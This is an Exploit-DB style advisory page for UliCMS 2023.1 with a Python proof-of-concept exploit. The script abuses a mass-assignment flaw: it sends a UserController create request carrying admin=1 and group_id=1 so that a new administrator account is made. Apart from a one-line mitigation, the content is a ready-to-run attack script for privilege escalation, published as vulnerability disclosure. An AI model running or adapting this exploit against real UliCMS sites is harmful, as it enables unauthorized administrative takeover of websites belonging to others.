Ulicms 2023.1 - create admin user via mass assignment

vendor:

Ulicms

by:

Mirabbas Agalarov

5.5

CVSS

MEDIUM

create admin user via mass assignment

798

CWE

Product Name: Ulicms

Affected Version From: 2023.1-sniffing-vicuna

Affected Version To: 2023.1-sniffing-vicuna

Patch Exists: NO

Related CWE:

CPE: a:ulicms:ulicms:2023.1-sniffing-vicuna

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Ulicms 2023.1 – create admin user via mass assignment

This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

Mitigation:

The vendor should fix the vulnerability by properly validating and sanitizing user input before creating new admin accounts.

Source

Exploit-DB raw data:

#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs:   create admin user via mass assignment
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

import requests

new_name=input("name: ")
new_email=input("email: ")
new_pass=input("password: ")

url = "http://localhost/dist/admin/index.php"

headers = {"Content-Type": "application/x-www-form-urlencoded"}

data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Request is success and created new admin account")
    
else:
    print("Request is failure.!!")
    
    
#POC video : https://youtu.be/SCkRJzJ0FVk